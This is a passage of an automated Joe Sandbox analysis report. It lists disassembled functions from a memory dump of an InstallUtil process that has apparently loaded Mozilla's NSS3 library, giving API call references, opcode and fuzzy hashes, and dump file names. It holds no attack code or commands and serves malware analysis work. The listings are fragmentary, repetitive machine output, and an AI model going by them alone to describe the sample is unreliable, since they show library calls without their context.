                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3714604333-0
                                                                                                                  • Opcode ID: 8569088b9411a28886448535dbab0fd9a49101ce5a57fe0a4556bc3b6fe01e95
                                                                                                                  • Instruction ID: 1cfe25fae0913a3aac003455f2b58194b383cdc2e39da52f6836d3c69994d201
                                                                                                                  • Opcode Fuzzy Hash: 8569088b9411a28886448535dbab0fd9a49101ce5a57fe0a4556bc3b6fe01e95
                                                                                                                  • Instruction Fuzzy Hash: 6A2128B1909200ABE7108E189E45BAA7BE4AF8573CF544739FC14AB7C0EB32D51587B2
                                                                                                                  Function 6C7DEE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7DEE85
                                                                                                                  • realloc.MOZGLUE(F0F7DD0C,?), ref: 6C7DEEAE
                                                                                                                  • PORT_Alloc_Util.NSS3(?), ref: 6C7DEEC5
                                                                                                                    • Part of subcall function 6C7B0BE0: malloc.MOZGLUE(6C7A8D2D,?,00000000,?), ref: 6C7B0BF8
                                                                                                                    • Part of subcall function 6C7B0BE0: TlsGetValue.KERNEL32(6C7A8D2D,?,00000000,?), ref: 6C7B0C15
                                                                                                                  • htonl.WSOCK32(?), ref: 6C7DEEE3
                                                                                                                  • htonl.WSOCK32(00000000,?), ref: 6C7DEEED
                                                                                                                  • memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C7DEF01
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1351805024-0
                                                                                                                  • Opcode ID: 275025b4a5ae7f3b25e6ca4b9a929da858f6bd49ef14daae6febcf9d79970619
                                                                                                                  • Instruction ID: 291ab3adfb2c4d0c62220cb8f29b9da52560a60a3c874c5709db728d08e5b3cf
                                                                                                                  • Opcode Fuzzy Hash: 275025b4a5ae7f3b25e6ca4b9a929da858f6bd49ef14daae6febcf9d79970619
                                                                                                                  • Instruction Fuzzy Hash: D121E471A002199FDF219F28DD8475AB7A8EF45358F198138EC089B641D330F814C7E2
                                                                                                                  Function 6C7A4820 Relevance: 9.1, APIs: 6, Instructions: 74stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C7A4EB8,?), ref: 6C7A4884
                                                                                                                    • Part of subcall function 6C7A8800: TlsGetValue.KERNEL32(?,6C7B085A,00000000,?,6C758369,?), ref: 6C7A8821
                                                                                                                    • Part of subcall function 6C7A8800: TlsGetValue.KERNEL32(?,?,6C7B085A,00000000,?,6C758369,?), ref: 6C7A883D
                                                                                                                    • Part of subcall function 6C7A8800: EnterCriticalSection.KERNEL32(?,?,?,6C7B085A,00000000,?,6C758369,?), ref: 6C7A8856
                                                                                                                    • Part of subcall function 6C7A8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C7A8887
                                                                                                                    • Part of subcall function 6C7A8800: PR_Unlock.NSS3(?,?,?,?,6C7B085A,00000000,?,6C758369,?), ref: 6C7A8899
                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C7A4EB8,?,?,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A484C
                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C7A4EB8,?,?,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A486D
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A4899
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A48A9
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A48B8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$CriticalEnterSectionUnlockstrcmp$CondErrorWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2226052791-0
                                                                                                                  • Opcode ID: 940261982934f8b1e98e978c9b0d362cf05733bd3319294635fffe4fbf0c4b9b
                                                                                                                  • Instruction ID: 868eba3d7440fef7c6c90bcff1928e1d1aa5a67563780e3bdd04e42736937708
                                                                                                                  • Opcode Fuzzy Hash: 940261982934f8b1e98e978c9b0d362cf05733bd3319294635fffe4fbf0c4b9b
                                                                                                                  • Instruction Fuzzy Hash: 6821D772F002409BEF205FE6FE89516B7B8EF0635D7041634DA0547A02EB22E816D7E1
                                                                                                                  Function 6C7B2550 Relevance: 9.1, APIs: 6, Instructions: 61memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 6C7B2576
                                                                                                                  • PORT_Alloc_Util.NSS3(00000000), ref: 6C7B2585
                                                                                                                    • Part of subcall function 6C7B0BE0: malloc.MOZGLUE(6C7A8D2D,?,00000000,?), ref: 6C7B0BF8
                                                                                                                    • Part of subcall function 6C7B0BE0: TlsGetValue.KERNEL32(6C7A8D2D,?,00000000,?), ref: 6C7B0C15
                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 6C7B25A1
                                                                                                                  • _waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 6C7B25AF
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C7B25BB
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C7B25CA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWidefree$Alloc_UtilValue_waccessmalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3520324648-0
                                                                                                                  • Opcode ID: ea03489dfc8800061af02f7bfd1338aa0a3bb53a0667d1027ca5578208292ef0
                                                                                                                  • Instruction ID: 9f46662eb8c06305311ec0ca357b7a1f8111f0d34d9e9fd6ac05bbc9b69ba9fa
                                                                                                                  • Opcode Fuzzy Hash: ea03489dfc8800061af02f7bfd1338aa0a3bb53a0667d1027ca5578208292ef0
                                                                                                                  • Instruction Fuzzy Hash: E801F5F17062017BFF202AB5AE1DE3B355CDF416E9B100170BC29E5682ED71D81086F2
                                                                                                                  Function 6C73C4E0 Relevance: 9.1, APIs: 6, Instructions: 52COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free$Value$CriticalDeleteSection
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 195087141-0
                                                                                                                  • Opcode ID: 7e708b9e264bbbdd7bff1bc29dda7c0c4dd71331f215690c1e7ada028e87ff01
                                                                                                                  • Instruction ID: 4f1745bf02e16fc54f49b572ab595cd334ad0b558c060ae0059380172d017b01
                                                                                                                  • Opcode Fuzzy Hash: 7e708b9e264bbbdd7bff1bc29dda7c0c4dd71331f215690c1e7ada028e87ff01
                                                                                                                  • Instruction Fuzzy Hash: 01114FB4604B118BCB21BFB9D14826EBBF4BF45349F051A3DD8CA87601EB30A454CBD2
                                                                                                                  Function 6C7E6840 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_NewMonitor.NSS3(00000000,?,6C7EAA9B,?,?,?,?,?,?,?,00000000,?,6C7E80C1), ref: 6C7E6846
                                                                                                                    • Part of subcall function 6C741770: calloc.MOZGLUE(00000001,0000019C,?,6C7415C2,?,?,?,?,?,00000001,00000040), ref: 6C74178D
                                                                                                                  • PR_NewMonitor.NSS3(00000000,?,6C7EAA9B,?,?,?,?,?,?,?,00000000,?,6C7E80C1), ref: 6C7E6855
                                                                                                                    • Part of subcall function 6C7A8680: calloc.MOZGLUE(00000001,00000028,00000000,-00000001,?,00000000,?,6C7555D0,00000000,00000000), ref: 6C7A868B
                                                                                                                    • Part of subcall function 6C7A8680: PR_NewLock.NSS3(00000000,00000000), ref: 6C7A86A0
                                                                                                                    • Part of subcall function 6C7A8680: PR_NewCondVar.NSS3(00000000,00000000,00000000), ref: 6C7A86B2
                                                                                                                    • Part of subcall function 6C7A8680: PR_NewCondVar.NSS3(00000000,?,00000000,00000000), ref: 6C7A86C8
                                                                                                                    • Part of subcall function 6C7A8680: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000), ref: 6C7A86E2
                                                                                                                    • Part of subcall function 6C7A8680: malloc.MOZGLUE(00000001,?,?,?,00000000,00000000), ref: 6C7A86EC
                                                                                                                    • Part of subcall function 6C7A8680: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000), ref: 6C7A8700
                                                                                                                  • PR_NewMonitor.NSS3(?,6C7EAA9B,?,?,?,?,?,?,?,00000000,?,6C7E80C1), ref: 6C7E687D
                                                                                                                    • Part of subcall function 6C741770: PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C7418DE
                                                                                                                    • Part of subcall function 6C741770: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,000005DC,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C7418F1
                                                                                                                  • PR_NewMonitor.NSS3(?,6C7EAA9B,?,?,?,?,?,?,?,00000000,?,6C7E80C1), ref: 6C7E688C
                                                                                                                    • Part of subcall function 6C741770: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C7418FC
                                                                                                                    • Part of subcall function 6C741770: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C74198A
                                                                                                                  • PR_NewLock.NSS3 ref: 6C7E68A5
                                                                                                                    • Part of subcall function 6C8198D0: calloc.MOZGLUE(00000001,00000084,6C740936,00000001,?,6C74102C), ref: 6C8198E5
                                                                                                                  • PR_NewLock.NSS3 ref: 6C7E68B4
                                                                                                                    • Part of subcall function 6C8198D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C819946
                                                                                                                    • Part of subcall function 6C8198D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6D16B7,00000000), ref: 6C81994E
                                                                                                                    • Part of subcall function 6C8198D0: free.MOZGLUE(00000000), ref: 6C81995E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Monitor$ErrorLockcalloc$CondCountCriticalInitializeLastSectionSpinfree$mallocstrcpystrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 200661885-0
                                                                                                                  • Opcode ID: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
                                                                                                                  • Instruction ID: 8599286bbc844fb696fbb472c87ccaba252571897e6a6be3eff6bd13d802c608
                                                                                                                  • Opcode Fuzzy Hash: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
                                                                                                                  • Instruction Fuzzy Hash: 5B0112B1A05F0B46E7516BB64A183E77AE85F05388F10493D85A9C5F40EF71E508CBA2
                                                                                                                  Function 6C75E520 Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_EnterMonitor.NSS3(00000000,?,?,6C767F5D,00000000,00000000,?,?,?,6C7680DD), ref: 6C75E532
                                                                                                                    • Part of subcall function 6C819090: TlsGetValue.KERNEL32 ref: 6C8190AB
                                                                                                                    • Part of subcall function 6C819090: TlsGetValue.KERNEL32 ref: 6C8190C9
                                                                                                                    • Part of subcall function 6C819090: EnterCriticalSection.KERNEL32 ref: 6C8190E5
                                                                                                                    • Part of subcall function 6C819090: TlsGetValue.KERNEL32 ref: 6C819116
                                                                                                                    • Part of subcall function 6C819090: LeaveCriticalSection.KERNEL32 ref: 6C81913F
                                                                                                                  • PR_EnterMonitor.NSS3(6C7680DD), ref: 6C75E549
                                                                                                                    • Part of subcall function 6C819090: LeaveCriticalSection.KERNEL32 ref: 6C8191AA
                                                                                                                    • Part of subcall function 6C819090: TlsGetValue.KERNEL32 ref: 6C819212
                                                                                                                    • Part of subcall function 6C819090: _PR_MD_WAIT_CV.NSS3 ref: 6C81926B
                                                                                                                  • PR_ExitMonitor.NSS3 ref: 6C75E56D
                                                                                                                  • PL_HashTableDestroy.NSS3 ref: 6C75E57B
                                                                                                                    • Part of subcall function 6C75E190: PR_EnterMonitor.NSS3(?,?,6C75E175), ref: 6C75E19C
                                                                                                                    • Part of subcall function 6C75E190: PR_EnterMonitor.NSS3(6C75E175), ref: 6C75E1AA
                                                                                                                    • Part of subcall function 6C75E190: PR_ExitMonitor.NSS3 ref: 6C75E208
                                                                                                                    • Part of subcall function 6C75E190: PL_HashTableRemove.NSS3(?), ref: 6C75E219
                                                                                                                    • Part of subcall function 6C75E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C75E231
                                                                                                                    • Part of subcall function 6C75E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C75E249
                                                                                                                    • Part of subcall function 6C75E190: PR_ExitMonitor.NSS3 ref: 6C75E257
                                                                                                                  • PR_ExitMonitor.NSS3(6C7680DD), ref: 6C75E5B5
                                                                                                                  • PR_DestroyMonitor.NSS3 ref: 6C75E5C3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Monitor$Enter$ExitValue$CriticalSection$Arena_DestroyFreeHashLeaveTableUtil$Remove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3740585915-0
                                                                                                                  • Opcode ID: 7adcd887e065253c653064df71741d3a5eeacdddc6967ecea3cb55e4eea2125e
                                                                                                                  • Instruction ID: 8d93bc3153da771a23efbd7fc6bb4bffdfff830790eabb3664974864aaff2c7f
                                                                                                                  • Opcode Fuzzy Hash: 7adcd887e065253c653064df71741d3a5eeacdddc6967ecea3cb55e4eea2125e
                                                                                                                  • Instruction Fuzzy Hash: 040140F1E14284CBEE219B78DF056913BB4B70634CF001036E419A1E12FB31A569EBDA
                                                                                                                  Function 6C73AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C73AFDA
                                                                                                                  Strings
                                                                                                                  • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C73AFC4
                                                                                                                  • %s at line %d of [%.10s], xrefs: 6C73AFD3
                                                                                                                  • misuse, xrefs: 6C73AFCE
                                                                                                                  • unable to delete/modify collation sequence due to active statements, xrefs: 6C73AF5C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_log
                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
                                                                                                                  • API String ID: 632333372-924978290
                                                                                                                  • Opcode ID: 564376c486138a65093eb69f80031c6d9239a86d59718c88a0261781eebbe717
                                                                                                                  • Instruction ID: abe72e23ad34e86aeea824bcfe0de375242534eb2b20ed1fdbfa7149997f4ec2
                                                                                                                  • Opcode Fuzzy Hash: 564376c486138a65093eb69f80031c6d9239a86d59718c88a0261781eebbe717
                                                                                                                  • Instruction Fuzzy Hash: B9911575B052268FDF04CF59CA55BAAB7F1BF45324F195468E868AB792C334EC01CB60
                                                                                                                  Function 6C6DE4C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 92COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108D2,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6DE53A
                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108BD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6DE5BC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_log
                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                  • API String ID: 632333372-598938438
                                                                                                                  • Opcode ID: 202311e9196610481b75ff52c2e54794d7d17020df67c948237315ca243c805a
                                                                                                                  • Instruction ID: 5557f05fb12cf79b03a67fdee5e469d704a844ab872fbcf007c61a4bb68bd041
                                                                                                                  • Opcode Fuzzy Hash: 202311e9196610481b75ff52c2e54794d7d17020df67c948237315ca243c805a
                                                                                                                  • Instruction Fuzzy Hash: 013155306407149BC321CEADC8809BAF3A1EB46764B550D7DE848A7B41F362F949C3E8
                                                                                                                  Function 6C7FA8F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6C7E2AE9,00000000,0000065C), ref: 6C7FA91D
                                                                                                                    • Part of subcall function 6C79ADC0: TlsGetValue.KERNEL32(?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE10
                                                                                                                    • Part of subcall function 6C79ADC0: EnterCriticalSection.KERNEL32(?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE24
                                                                                                                    • Part of subcall function 6C79ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C77D079,00000000,00000001), ref: 6C79AE5A
                                                                                                                    • Part of subcall function 6C79ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE6F
                                                                                                                    • Part of subcall function 6C79ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE7F
                                                                                                                    • Part of subcall function 6C79ADC0: TlsGetValue.KERNEL32(?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AEB1
                                                                                                                    • Part of subcall function 6C79ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AEC9
                                                                                                                  • PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6C7E2AE9,00000000,0000065C), ref: 6C7FA934
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000,00000000,00000000,?,?,6C7E2AE9,00000000,0000065C), ref: 6C7FA949
                                                                                                                  • free.MOZGLUE(?,00000000,0000065C), ref: 6C7FA952
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                  • String ID: *~l
                                                                                                                  • API String ID: 1595327144-3946691403
                                                                                                                  • Opcode ID: 3a3622eba7752032dc9c5ea3218cfcc2bb43fd3ce69dfce662eb133e3799cb40
                                                                                                                  • Instruction ID: 3424b567aaa3c246570c834646cd244e3fdb60ae9a7d0ad4d2a2f25a7b44dafa
                                                                                                                  • Opcode Fuzzy Hash: 3a3622eba7752032dc9c5ea3218cfcc2bb43fd3ce69dfce662eb133e3799cb40
                                                                                                                  • Instruction Fuzzy Hash: AE313CB46012019FD704CF24DAC4E62BBF8FF48328B1581B9E8198B756E730E801CFA1
                                                                                                                  Function 6C756420 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
